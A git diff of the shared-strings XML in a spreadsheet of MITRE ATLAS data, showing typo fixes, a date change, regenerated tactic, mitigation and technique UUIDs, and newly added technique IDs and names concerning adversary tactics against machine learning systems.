     <t xml:space="preserve">Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
 Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various ML resources and services.
 Compromised credentials may provide access to additional ML artifacts and allow the adversary to perform [Discover ML Artifacts](/techniques/AML.T0007).
-Compromised credentials may also grant and adversary increased privileges such as write access to ML artifacts used during development or production.
+Compromised credentials may also grant an adversary increased privileges such as write access to ML artifacts used during development or production.
 </t>
   </si>
   <si>
@@ -1548,7 +1548,7 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>12 January 2024</t>
+    <t>11 March 2024</t>
   </si>
   <si>
     <t>Resource Development</t>
@@ -1650,46 +1650,46 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--afe18db5-cd3b-404c-8993-3aaf488c5f62</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--f3deea7c-6d5a-49e7-ae3a-d70afc7889c9</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--9633dd67-f5e8-4a19-88aa-c9b6fcf9596c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c8c04179-cc2c-4a1d-b392-e6d4c42c3493</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d9deeb4d-c193-469d-a1c8-52e6d145da0c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--2538ccce-34dd-4470-8c3f-747be088b4e6</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--f7d86c97-d8a6-4b81-a4a3-b49191faeced</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--876860aa-e340-435c-824b-b5dd011c4c95</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c05767a2-5965-4618-b66e-6a7fffed256a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--813efb61-5bed-439d-a264-1b4e0ab89c37</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8bb9a040-d075-4566-966d-4a6a588f4fad</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--39d150db-6130-4b2e-81e5-754b344a6a00</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d4d10ed9-f6d7-4774-a9f0-68bf4970c5bd</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--4cd8009a-c196-4c3d-8eae-87afa661ed8e</t>
+    <t>x-mitre-tactic--b88656b8-92b5-48c8-aa0d-401d09225c3a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8407dd06-d298-4fcb-b42c-5e459685d96c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--aea8785b-aff2-4ffb-97a9-724e16802cd0</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--38834033-1aaf-4fac-a120-baae566da1f4</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--560abc82-7f87-4ae5-8d5a-18e0de351c4e</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--86985fad-fc0c-4b01-9441-f1c005dc529e</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--f84385a0-14f1-41d0-8256-02e34d3b6fd1</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--332194a6-2b0b-445e-900f-28c5588d3996</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--eec9cdf5-d82d-4b12-8d7c-5bcf661c4c8c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--7343b749-f8e5-4bc5-88a3-78b80a05456c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a2b28f78-92b9-476f-968c-427462a3d057</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d7e6e3f1-7033-47a0-b162-51cffda7932a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--0bdff1ba-04fb-43bc-9559-de278508fe94</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d59655a1-d955-47af-bea8-a776ae7383bb</t>
   </si>
   <si>
     <t>Defense Evasion</t>
@@ -1736,7 +1736,7 @@
   <si>
     <t xml:space="preserve">The adversary is trying to steal machine learning artifacts or other information about the machine learning system.
 Exfiltration consists of techniques that adversaries may use to steal data from your network.
-Data may be stolen for it's valuable intellectual property, or for use in staging future operations.
+Data may be stolen for its valuable intellectual property, or for use in staging future operations.
 Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
 </t>
   </si>
@@ -1908,64 +1908,64 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--37862c51-9708-45b5-b5a9-2ced6b96a68f</t>
-  </si>
-  <si>
-    <t>course-of-action--18bc0088-18e3-4574-9381-15609c31ceb0</t>
-  </si>
-  <si>
-    <t>course-of-action--4183e593-214b-4ed5-9502-6e8521d520b5</t>
-  </si>
-  <si>
-    <t>course-of-action--c240c5a6-335d-4b63-8a19-3a580f503554</t>
-  </si>
-  <si>
-    <t>course-of-action--007dbf17-b2dd-4f64-9a19-14ac15f48167</t>
-  </si>
-  <si>
-    <t>course-of-action--0df12e98-f47a-4126-8512-ff573cbfb6ea</t>
-  </si>
-  <si>
-    <t>course-of-action--a36f50c4-0980-4431-bd60-40fab20d484f</t>
-  </si>
-  <si>
-    <t>course-of-action--421d1626-df4b-4b92-86d7-e52fe8fee878</t>
-  </si>
-  <si>
-    <t>course-of-action--bd372226-3ba2-42c8-b3f0-2d626b2bf371</t>
-  </si>
-  <si>
-    <t>course-of-action--715592a1-75ba-4dc8-bf6b-68536514fb6c</t>
-  </si>
-  <si>
-    <t>course-of-action--034ac08c-c7bc-4480-964d-fe38d95cd72b</t>
-  </si>
-  <si>
-    <t>course-of-action--b42ad31a-c1af-4ad2-bf02-645f7067f5ee</t>
-  </si>
-  <si>
-    <t>course-of-action--8a2bc097-241b-4f3f-918f-73f69870991b</t>
-  </si>
-  <si>
-    <t>course-of-action--dadd5d29-8028-4363-8588-adc91ccda11d</t>
-  </si>
-  <si>
-    <t>course-of-action--61fec3f7-9ec5-419c-9cc3-28af52b4bd7a</t>
-  </si>
-  <si>
-    <t>course-of-action--e2578c53-56ee-411e-857f-7df0a8c0cb67</t>
-  </si>
-  <si>
-    <t>course-of-action--81b36332-b327-4f81-8017-73c70fe05de8</t>
-  </si>
-  <si>
-    <t>course-of-action--e718dbef-3905-4a58-9995-2e4c4f57e6f9</t>
-  </si>
-  <si>
-    <t>course-of-action--51811258-1da9-4724-95b0-06b4eebda05e</t>
-  </si>
-  <si>
-    <t>course-of-action--7d428c47-7519-4350-9230-f0ac2e108232</t>
+    <t>course-of-action--b7d1db40-dd7b-4b7d-b803-1283b7c4f55e</t>
+  </si>
+  <si>
+    <t>course-of-action--c48829c8-5581-45d6-a34a-112aa85d704c</t>
+  </si>
+  <si>
+    <t>course-of-action--374749c7-19c4-49ee-8267-f3ea862157a7</t>
+  </si>
+  <si>
+    <t>course-of-action--6b26a096-3222-48ec-bf45-c30f320cbd2a</t>
+  </si>
+  <si>
+    <t>course-of-action--55038247-dea1-4414-8d8d-2278818d0f7e</t>
+  </si>
+  <si>
+    <t>course-of-action--fa399546-7037-4e50-bd5b-3d41f3997812</t>
+  </si>
+  <si>
+    <t>course-of-action--b56f6da0-2051-401e-89e2-a63e156872d5</t>
+  </si>
+  <si>
+    <t>course-of-action--3686113d-731b-42b6-9d36-efcbca71c3b7</t>
+  </si>
+  <si>
+    <t>course-of-action--9994c985-080a-4652-bfc0-28b19059fac2</t>
+  </si>
+  <si>
+    <t>course-of-action--b4066cd9-3bb6-4a89-8f32-7f207168d086</t>
+  </si>
+  <si>
+    <t>course-of-action--df57183e-147b-4caf-bffc-ee6265aa99f2</t>
+  </si>
+  <si>
+    <t>course-of-action--836bd250-7e46-4c9c-801b-b2d82132d429</t>
+  </si>
+  <si>
+    <t>course-of-action--656b4297-4395-4efc-9396-cf08523518c2</t>
+  </si>
+  <si>
+    <t>course-of-action--5ab160b2-9de8-4ade-b5bb-aa516f04f9da</t>
+  </si>
+  <si>
+    <t>course-of-action--5a4a5a17-16a8-4a02-b1a3-6ad3c72c95e3</t>
+  </si>
+  <si>
+    <t>course-of-action--488b2d71-b7b9-403d-85d0-48aef040007d</t>
+  </si>
+  <si>
+    <t>course-of-action--0408cdf3-2274-4f06-be37-7724c34a0ac7</t>
+  </si>
+  <si>
+    <t>course-of-action--f32006de-3282-47c6-ae96-11e13d132283</t>
+  </si>
+  <si>
+    <t>course-of-action--1341b145-8eaf-471f-b090-b5bf24164b64</t>
+  </si>
+  <si>
+    <t>course-of-action--632e55d7-462b-44a8-a652-cbb7f64328d2</t>
   </si>
   <si>
     <t>Adversarial Input Detection</t>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1139" uniqueCount="599">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1273" uniqueCount="686">
   <si>
     <t>ID</t>
   </si>
@@ -46,6 +46,9 @@
     <t>platforms</t>
   </si>
   <si>
+    <t>AML.T0040</t>
+  </si>
+  <si>
     <t>AML.T0008</t>
   </si>
   <si>
@@ -106,6 +109,12 @@
     <t>AML.T0051.000</t>
   </si>
   <si>
+    <t>AML.T0063</t>
+  </si>
+  <si>
+    <t>AML.T0062</t>
+  </si>
+  <si>
     <t>AML.T0007</t>
   </si>
   <si>
@@ -115,6 +124,12 @@
     <t>AML.T0013</t>
   </si>
   <si>
+    <t>AML.T0008.002</t>
+  </si>
+  <si>
+    <t>AML.T0059</t>
+  </si>
+  <si>
     <t>AML.T0031</t>
   </si>
   <si>
@@ -181,6 +196,9 @@
     <t>AML.T0051</t>
   </si>
   <si>
+    <t>AML.T0061</t>
+  </si>
+  <si>
     <t>AML.T0035</t>
   </si>
   <si>
@@ -190,9 +208,6 @@
     <t>AML.T0048.004</t>
   </si>
   <si>
-    <t>AML.T0040</t>
-  </si>
-  <si>
     <t>AML.T0010.001</t>
   </si>
   <si>
@@ -202,6 +217,9 @@
     <t>AML.T0047</t>
   </si>
   <si>
+    <t>AML.T0011.001</t>
+  </si>
+  <si>
     <t>AML.T0043.003</t>
   </si>
   <si>
@@ -217,6 +235,9 @@
     <t>AML.T0052</t>
   </si>
   <si>
+    <t>AML.T0008.003</t>
+  </si>
+  <si>
     <t>AML.T0041</t>
   </si>
   <si>
@@ -229,9 +250,15 @@
     <t>AML.T0000.001</t>
   </si>
   <si>
+    <t>AML.T0060</t>
+  </si>
+  <si>
     <t>AML.T0019</t>
   </si>
   <si>
+    <t>AML.T0058</t>
+  </si>
+  <si>
     <t>AML.T0048.001</t>
   </si>
   <si>
@@ -292,250 +319,280 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--f84d258e-bdf5-4a55-86c6-5baacf11a693</t>
-  </si>
-  <si>
-    <t>attack-pattern--0e65f2b9-d758-4da7-8c85-b4a7db57e0ab</t>
-  </si>
-  <si>
-    <t>attack-pattern--fffc05f7-a56b-4da3-914c-9711854d58b7</t>
-  </si>
-  <si>
-    <t>attack-pattern--29f0ad47-f922-463e-a37e-665078b37865</t>
-  </si>
-  <si>
-    <t>attack-pattern--12bb3bb3-4fc4-4e4d-8989-1672d07a0779</t>
-  </si>
-  <si>
-    <t>attack-pattern--2e2e892e-984b-4cbc-8b8a-e460889619a1</t>
-  </si>
-  <si>
-    <t>attack-pattern--7a6a57da-bca7-4e44-8511-01cf1764cce8</t>
-  </si>
-  <si>
-    <t>attack-pattern--deb59ff4-c171-4d42-a38e-d730f17fbff0</t>
-  </si>
-  <si>
-    <t>attack-pattern--70f2312c-b38f-4116-908f-b1f966773835</t>
-  </si>
-  <si>
-    <t>attack-pattern--48d1c8b2-bcc2-43a4-9876-7436d0763f3d</t>
-  </si>
-  <si>
-    <t>attack-pattern--ef60d8b9-25c4-4550-9ad4-9be85f7454c8</t>
-  </si>
-  <si>
-    <t>attack-pattern--9c149338-3db5-4647-a402-44a5b39b6f57</t>
-  </si>
-  <si>
-    <t>attack-pattern--26a43256-8e9f-4b68-970c-5ae31047ac5e</t>
-  </si>
-  <si>
-    <t>attack-pattern--3d5216c2-7885-4070-a2ac-61ce9dc9add7</t>
-  </si>
-  <si>
-    <t>attack-pattern--c30c84ef-85cf-45a5-9ba6-68cd613f14b4</t>
-  </si>
-  <si>
-    <t>attack-pattern--fa9116d8-3361-4d55-8596-9e15512cde59</t>
-  </si>
-  <si>
-    <t>attack-pattern--14d1c118-8f21-477d-ba59-40a37c8907fd</t>
-  </si>
-  <si>
-    <t>attack-pattern--867688f9-2b19-4133-905f-d63cf65508b8</t>
-  </si>
-  <si>
-    <t>attack-pattern--7a41f961-9087-4da3-97d4-9f0fd32f61a3</t>
-  </si>
-  <si>
-    <t>attack-pattern--ca47098b-6891-4ef0-bf76-2fc80e260f4a</t>
-  </si>
-  <si>
-    <t>attack-pattern--2c65040c-4638-40a0-bac1-f6e77888a828</t>
-  </si>
-  <si>
-    <t>attack-pattern--d3659e5f-430b-451c-8b16-4b54e5a6c4b4</t>
-  </si>
-  <si>
-    <t>attack-pattern--c24bef4b-27f1-4a40-af66-f4ecbebb74cd</t>
-  </si>
-  <si>
-    <t>attack-pattern--2690a529-6cbe-43c0-b896-0485f57aaa38</t>
-  </si>
-  <si>
-    <t>attack-pattern--55414454-7a66-44be-b8d7-3eb172ab5aaf</t>
-  </si>
-  <si>
-    <t>attack-pattern--61d256af-5427-4295-83a8-d145574e4bc6</t>
-  </si>
-  <si>
-    <t>attack-pattern--3e48042d-3216-41c4-a4b6-c6d05275fa58</t>
-  </si>
-  <si>
-    <t>attack-pattern--3b9dbf0f-1740-401d-9cd2-42d84e63d4c1</t>
-  </si>
-  <si>
-    <t>attack-pattern--a58125ca-f6f7-42f7-8b0b-28c61371f07e</t>
-  </si>
-  <si>
-    <t>attack-pattern--9222f38d-39fe-489d-9f3b-b0f1493c3293</t>
-  </si>
-  <si>
-    <t>attack-pattern--b6bac6fd-d491-4438-bde9-e1e0242533f5</t>
-  </si>
-  <si>
-    <t>attack-pattern--b06e6fad-f780-4542-8a77-23a586fc4bd2</t>
-  </si>
-  <si>
-    <t>attack-pattern--ac3ffe91-3ff5-485f-b22f-1a8c29c29905</t>
-  </si>
-  <si>
-    <t>attack-pattern--4ded00bf-4a1d-44c8-a54b-0d9cd8650b63</t>
-  </si>
-  <si>
-    <t>attack-pattern--3b08eb54-67d8-44fa-8ee8-fa80f9ed4aca</t>
-  </si>
-  <si>
-    <t>attack-pattern--c2f2e998-09ac-42bc-9c28-dbb94719fb64</t>
-  </si>
-  <si>
-    <t>attack-pattern--d999ea10-efdb-4c4e-aa21-99df5169e58c</t>
-  </si>
-  <si>
-    <t>attack-pattern--2e1757fc-6f1c-448a-8027-af9006884e53</t>
-  </si>
-  <si>
-    <t>attack-pattern--36e0d80a-31d3-4b5d-9948-7b01ce7a2597</t>
-  </si>
-  <si>
-    <t>attack-pattern--c5adc2d1-924a-4e33-aea2-04d28865d087</t>
-  </si>
-  <si>
-    <t>attack-pattern--d3b25546-57e8-4bf0-95d4-2a68dc527c28</t>
-  </si>
-  <si>
-    <t>attack-pattern--c6cbb0f1-c62d-4fec-821a-5d1c8d2a9ab6</t>
-  </si>
-  <si>
-    <t>attack-pattern--f9320320-4952-4498-ab9c-01666e3a648e</t>
-  </si>
-  <si>
-    <t>attack-pattern--db51953d-c785-497f-ba7c-5459d6a87b8f</t>
-  </si>
-  <si>
-    <t>attack-pattern--8205238a-d1a2-467d-8d5b-6394c57195d6</t>
-  </si>
-  <si>
-    <t>attack-pattern--4d33022e-1df9-40ec-bb57-5bc4cd4ede97</t>
-  </si>
-  <si>
-    <t>attack-pattern--e2cd036d-14fa-48f9-9640-83d20859c6f0</t>
-  </si>
-  <si>
-    <t>attack-pattern--6f218799-67ae-4a31-8f66-893e1bbac1a9</t>
-  </si>
-  <si>
-    <t>attack-pattern--df039ea9-d621-46fd-828a-f99b537b6dba</t>
-  </si>
-  <si>
-    <t>attack-pattern--0f64afba-ef9b-4d51-bae4-8d882948002c</t>
-  </si>
-  <si>
-    <t>attack-pattern--ec5266cd-b135-45c6-983d-c85bc4f47c22</t>
-  </si>
-  <si>
-    <t>attack-pattern--814c1574-c3dc-4a74-b8c2-d087f7f83342</t>
-  </si>
-  <si>
-    <t>attack-pattern--72502166-71f3-46b3-a997-90a154c1bd93</t>
-  </si>
-  <si>
-    <t>attack-pattern--2b1504b5-f1c3-44ff-b8a4-8bee6da2decd</t>
-  </si>
-  <si>
-    <t>attack-pattern--cf20a7b3-ab3a-46d3-b382-0051d04a52e3</t>
-  </si>
-  <si>
-    <t>attack-pattern--a9148181-8a03-426d-959c-7ca3e9083dd2</t>
-  </si>
-  <si>
-    <t>attack-pattern--0924ffaf-71b3-460e-b406-c79fa09b1f40</t>
-  </si>
-  <si>
-    <t>attack-pattern--196fa43b-b283-44d9-bf51-596b11823fdf</t>
-  </si>
-  <si>
-    <t>attack-pattern--3db4bc83-6b83-42c4-8f6e-a6701669c4ea</t>
-  </si>
-  <si>
-    <t>attack-pattern--990b6f83-2795-4b78-8177-e8edc6ec645f</t>
-  </si>
-  <si>
-    <t>attack-pattern--409ea4e4-54ac-4981-a81f-0b08342c6e12</t>
-  </si>
-  <si>
-    <t>attack-pattern--0024d2d7-eee5-40e2-b030-231de594deaa</t>
-  </si>
-  <si>
-    <t>attack-pattern--ff7b5af1-eb50-4083-b4bb-dff7cac32a9e</t>
-  </si>
-  <si>
-    <t>attack-pattern--e4835863-bd95-412a-8a90-9b46b2ba710d</t>
-  </si>
-  <si>
-    <t>attack-pattern--7ccdc910-8651-44c1-b346-40ed08464065</t>
-  </si>
-  <si>
-    <t>attack-pattern--e93e8834-0087-439e-9ff5-8067ae326c6f</t>
-  </si>
-  <si>
-    <t>attack-pattern--f3603313-1991-4c1d-bce9-e53e9f59098d</t>
-  </si>
-  <si>
-    <t>attack-pattern--d606e63a-e87c-4591-80bd-56e069084ba3</t>
-  </si>
-  <si>
-    <t>attack-pattern--5f6941d2-afe3-4e6e-873e-ca770e4656ca</t>
-  </si>
-  <si>
-    <t>attack-pattern--37b4d9da-15b0-4484-a5fe-2f2cadbe77f2</t>
-  </si>
-  <si>
-    <t>attack-pattern--66e6cac5-a75c-4240-92a5-4b1555c595c8</t>
-  </si>
-  <si>
-    <t>attack-pattern--9efeb631-41fc-4f06-a66c-5ac95e3afb3c</t>
-  </si>
-  <si>
-    <t>attack-pattern--030eaf7f-950b-4367-ac30-d1f18aad809e</t>
-  </si>
-  <si>
-    <t>attack-pattern--b5f286c5-05f2-4ff2-ba29-55ed2ab3a6fb</t>
-  </si>
-  <si>
-    <t>attack-pattern--2367d435-f615-4318-8a7e-1b57e43796f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--11e9af8d-767c-4362-8b77-21b04b11d07c</t>
-  </si>
-  <si>
-    <t>attack-pattern--9ddbd89f-1055-49a8-80a8-a7c12271bb97</t>
-  </si>
-  <si>
-    <t>attack-pattern--d7f0ed90-f99e-41a3-95bf-c56d68a29969</t>
-  </si>
-  <si>
-    <t>attack-pattern--056a10c1-fdd7-4a8c-94b4-4e09b20c8727</t>
-  </si>
-  <si>
-    <t>attack-pattern--e815b4bb-491a-4773-9ac1-2456359c44c0</t>
-  </si>
-  <si>
-    <t>attack-pattern--ad12475f-3e43-4b41-98e5-9dcb874132a3</t>
-  </si>
-  <si>
-    <t>attack-pattern--08f770d7-8260-43e4-98f7-0b15e1028f54</t>
+    <t>attack-pattern--90a420d4-3f03-4800-86c0-223c4376804a</t>
+  </si>
+  <si>
+    <t>attack-pattern--01203e88-6c9a-4611-b278-7ba3c604a234</t>
+  </si>
+  <si>
+    <t>attack-pattern--aa17fe8d-62f8-4c4c-b7a2-6858c82dd84b</t>
+  </si>
+  <si>
+    <t>attack-pattern--79460396-01b4-4e91-8695-7d26df1abb95</t>
+  </si>
+  <si>
+    <t>attack-pattern--3250c828-3852-4efb-857d-f7ca5c1a1ebc</t>
+  </si>
+  <si>
+    <t>attack-pattern--4f0f548a-5f39-4dc7-b5e6-c84d824e39bd</t>
+  </si>
+  <si>
+    <t>attack-pattern--c704a49c-abf0-4258-9919-a862b1865469</t>
+  </si>
+  <si>
+    <t>attack-pattern--c4e52005-7416-45c4-9feb-8cd5fd34f70a</t>
+  </si>
+  <si>
+    <t>attack-pattern--241ad2a0-3fe2-4912-bb77-b79cee573fd2</t>
+  </si>
+  <si>
+    <t>attack-pattern--716d3a6b-2f8c-4a1f-85f7-d884bb7b2800</t>
+  </si>
+  <si>
+    <t>attack-pattern--c90d78ed-0f2f-41e9-b85f-1d13be7a40f6</t>
+  </si>
+  <si>
+    <t>attack-pattern--ae71ca3a-8ca4-40d2-bdba-4276b29ac8f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--a7c30122-b393-4265-91b7-57cd1211e3f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--c2bd321e-e196-4954-a8e9-c22f1793acc7</t>
+  </si>
+  <si>
+    <t>attack-pattern--8d644240-ad99-4410-a7f8-3ef8f53a463e</t>
+  </si>
+  <si>
+    <t>attack-pattern--9f998b9a-d20e-48e7-bee5-034ed5a696dd</t>
+  </si>
+  <si>
+    <t>attack-pattern--a7f17bbd-e2fd-4413-89e1-a5e5226cc23c</t>
+  </si>
+  <si>
+    <t>attack-pattern--a3baff3d-7228-4ab7-ae00-ffe150e7ef8a</t>
+  </si>
+  <si>
+    <t>attack-pattern--8f644f37-e2e6-468e-b720-f395b8c27fbc</t>
+  </si>
+  <si>
+    <t>attack-pattern--c9153697-7d92-43aa-a16e-38436beff79d</t>
+  </si>
+  <si>
+    <t>attack-pattern--d911e8cb-0601-42f1-90de-7ce0b21cd578</t>
+  </si>
+  <si>
+    <t>attack-pattern--0926acf1-f3e0-40ef-af0d-89515371bf89</t>
+  </si>
+  <si>
+    <t>attack-pattern--782c346d-9af5-4145-b6c6-b9cccdc2c950</t>
+  </si>
+  <si>
+    <t>attack-pattern--6a88dccb-fb37-4f11-a5ad-42908aaee1d0</t>
+  </si>
+  <si>
+    <t>attack-pattern--c552f0b5-2e2c-4f8f-badc-0876ecca7255</t>
+  </si>
+  <si>
+    <t>attack-pattern--943303ef-846b-49d6-b53f-b0b9341ac1ca</t>
+  </si>
+  <si>
+    <t>attack-pattern--dd88c52a-ec0f-42fa-8622-f992d6bcf2d5</t>
+  </si>
+  <si>
+    <t>attack-pattern--89731d07-679e-4da3-8f70-aba314068a89</t>
+  </si>
+  <si>
+    <t>attack-pattern--8735735d-c09d-4298-8e64-9a2b6168a74c</t>
+  </si>
+  <si>
+    <t>attack-pattern--aaa79096-814f-4fb0-a553-1701b2765317</t>
+  </si>
+  <si>
+    <t>attack-pattern--071df654-813a-4708-85dc-f715f785d37f</t>
+  </si>
+  <si>
+    <t>attack-pattern--2680aa95-5620-4677-9c62-b0c3d15d9450</t>
+  </si>
+  <si>
+    <t>attack-pattern--b07d147f-51c8-4eb6-9a05-09c86762a9c1</t>
+  </si>
+  <si>
+    <t>attack-pattern--47d73872-5336-44f7-81e3-d30bc7e039dd</t>
+  </si>
+  <si>
+    <t>attack-pattern--ba500f0e-52ca-40ff-aed4-e6dbf00cca10</t>
+  </si>
+  <si>
+    <t>attack-pattern--f78e0ac3-6d72-42ed-b20a-e10d8c752cf6</t>
+  </si>
+  <si>
+    <t>attack-pattern--4b1c5ebf-e05d-414d-a557-5c29f505f589</t>
+  </si>
+  <si>
+    <t>attack-pattern--3de90963-bc9f-4ae1-b780-7d05e46eacdd</t>
+  </si>
+  <si>
+    <t>attack-pattern--8dfc1d73-0de8-4daa-a8cf-83e019347395</t>
+  </si>
+  <si>
+    <t>attack-pattern--a4a55526-2f1f-403b-9691-609e46381e17</t>
+  </si>
+  <si>
+    <t>attack-pattern--86b5f486-afb8-4aa9-991f-0e24d5737f0c</t>
+  </si>
+  <si>
+    <t>attack-pattern--a50f02df-1130-4945-94bb-7857952da585</t>
+  </si>
+  <si>
+    <t>attack-pattern--b15151a4-d832-46b0-8ddd-14dad0b67afc</t>
+  </si>
+  <si>
+    <t>attack-pattern--e19c6f8a-f1e2-46cc-9387-03a3092f01ed</t>
+  </si>
+  <si>
+    <t>attack-pattern--a17a1941-ca02-4273-9d7f-d864ea122bdb</t>
+  </si>
+  <si>
+    <t>attack-pattern--45d378aa-20ae-401d-bf61-7f00104eeaca</t>
+  </si>
+  <si>
+    <t>attack-pattern--172427e3-9ecc-49a3-b628-96b824cc4131</t>
+  </si>
+  <si>
+    <t>attack-pattern--e98acce8-ed69-4ebe-845b-1bcb662836ba</t>
+  </si>
+  <si>
+    <t>attack-pattern--adbb0dd5-ff66-4b2f-869f-bfb3fdb45fc8</t>
+  </si>
+  <si>
+    <t>attack-pattern--19cd2d12-66ff-487c-a05c-e058b027efc9</t>
+  </si>
+  <si>
+    <t>attack-pattern--f16a79dd-95ff-4eb7-a986-18a727c4fc9d</t>
+  </si>
+  <si>
+    <t>attack-pattern--e2ebc190-9ff6-496e-afeb-ac868df2361e</t>
+  </si>
+  <si>
+    <t>attack-pattern--d65acc80-abf9-4147-a612-6536d31c5a91</t>
+  </si>
+  <si>
+    <t>attack-pattern--d1f013a8-11f3-4560-831c-8ed5e39247c9</t>
+  </si>
+  <si>
+    <t>attack-pattern--d8292a1c-21e7-4b45-b110-0e05feb30a9a</t>
+  </si>
+  <si>
+    <t>attack-pattern--d2cf31e0-a550-4fe0-8fdb-8941b3ac00d9</t>
+  </si>
+  <si>
+    <t>attack-pattern--b5626410-b33d-4487-9c0f-2b7d844b8e95</t>
+  </si>
+  <si>
+    <t>attack-pattern--7d76070d-2124-4ee6-913d-6015a697eaf6</t>
+  </si>
+  <si>
+    <t>attack-pattern--fa01f518-7217-4432-83c6-772d9390647c</t>
+  </si>
+  <si>
+    <t>attack-pattern--452b8fdf-8679-4013-bb38-4d16f65430bc</t>
+  </si>
+  <si>
+    <t>attack-pattern--c086784e-1494-4f75-a4a0-d3ad054b9428</t>
+  </si>
+  <si>
+    <t>attack-pattern--db2b3112-a99b-45a0-be10-c69157b616f0</t>
+  </si>
+  <si>
+    <t>attack-pattern--1f1f14ef-7d04-42b2-9f05-b740113b30f5</t>
+  </si>
+  <si>
+    <t>attack-pattern--c2ca6b46-bcdf-45a8-b33d-3272c7a65cde</t>
+  </si>
+  <si>
+    <t>attack-pattern--4d5c6974-0307-4535-bf37-7bb4c6a2ef47</t>
+  </si>
+  <si>
+    <t>attack-pattern--e0eb2b64-aebd-4412-80f3-b71d7805a65f</t>
+  </si>
+  <si>
+    <t>attack-pattern--0ec538ca-589b-4e42-bcaa-06097a0d679f</t>
+  </si>
+  <si>
+    <t>attack-pattern--f09d9beb-4cb5-4094-83b6-e46bedc8a20e</t>
+  </si>
+  <si>
+    <t>attack-pattern--53c52153-8a3f-4952-8e20-e9ab7ca899a7</t>
+  </si>
+  <si>
+    <t>attack-pattern--f4fc2abd-71a4-401a-a742-18fc5aeb4bc3</t>
+  </si>
+  <si>
+    <t>attack-pattern--e3b9d41a-d2f9-4825-942f-1c4a30b4d2f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--69e73593-f838-4855-9096-c316eabfb4d6</t>
+  </si>
+  <si>
+    <t>attack-pattern--8c26f51a-c403-4c4d-852a-a1c56fe9e7cd</t>
+  </si>
+  <si>
+    <t>attack-pattern--b23cda85-3457-406d-b043-24d2cf9e6fcf</t>
+  </si>
+  <si>
+    <t>attack-pattern--8f510e67-2f0c-4642-9811-25c67643363c</t>
+  </si>
+  <si>
+    <t>attack-pattern--65d21e6b-7abe-4623-8f5c-88011cb362cb</t>
+  </si>
+  <si>
+    <t>attack-pattern--5921c4ad-0a32-47fb-8ab2-67d18dbac8ba</t>
+  </si>
+  <si>
+    <t>attack-pattern--d18afb87-0de2-43dc-ab6a-eb914a7dbae7</t>
+  </si>
+  <si>
+    <t>attack-pattern--6c1fca80-3ba9-41c9-8f7b-9824310a94f1</t>
+  </si>
+  <si>
+    <t>attack-pattern--7159b4d1-7681-4028-8110-8ebdb16c7700</t>
+  </si>
+  <si>
+    <t>attack-pattern--b37a58fd-ee29-4f1d-92d8-3bfccf884e8b</t>
+  </si>
+  <si>
+    <t>attack-pattern--75e15967-69df-4bdf-b662-979fb1e56c3e</t>
+  </si>
+  <si>
+    <t>attack-pattern--a3660a2d-f6e5-4f1b-9618-332cceb389c8</t>
+  </si>
+  <si>
+    <t>attack-pattern--be6ef5c5-1ecb-486d-9743-42085bd2c256</t>
+  </si>
+  <si>
+    <t>attack-pattern--04d61746-9df1-468e-99d3-0a4685856deb</t>
+  </si>
+  <si>
+    <t>attack-pattern--ad290fa3-d87b-43d2-a547-bfa22387c132</t>
+  </si>
+  <si>
+    <t>attack-pattern--8c849dd4-5d15-45aa-b5b2-59c96a3ab939</t>
+  </si>
+  <si>
+    <t>attack-pattern--6ca1ad37-f08f-4f15-b85d-a48905cc245c</t>
+  </si>
+  <si>
+    <t>attack-pattern--1b047901-cd87-4d1d-aa88-d7335855b65f</t>
+  </si>
+  <si>
+    <t>attack-pattern--b587a898-010b-4b2f-98a4-379d7c36c9e0</t>
+  </si>
+  <si>
+    <t>attack-pattern--ab01ba21-1438-4cd9-a588-92eb271086bc</t>
+  </si>
+  <si>
+    <t>AI Model Inference API Access</t>
   </si>
   <si>
     <t>Acquire Infrastructure</t>
@@ -598,6 +655,12 @@
     <t>Direct</t>
   </si>
   <si>
+    <t>Discover AI Model Outputs</t>
+  </si>
+  <si>
+    <t>Discover LLM Hallucinations</t>
+  </si>
+  <si>
     <t>Discover ML Artifacts</t>
   </si>
   <si>
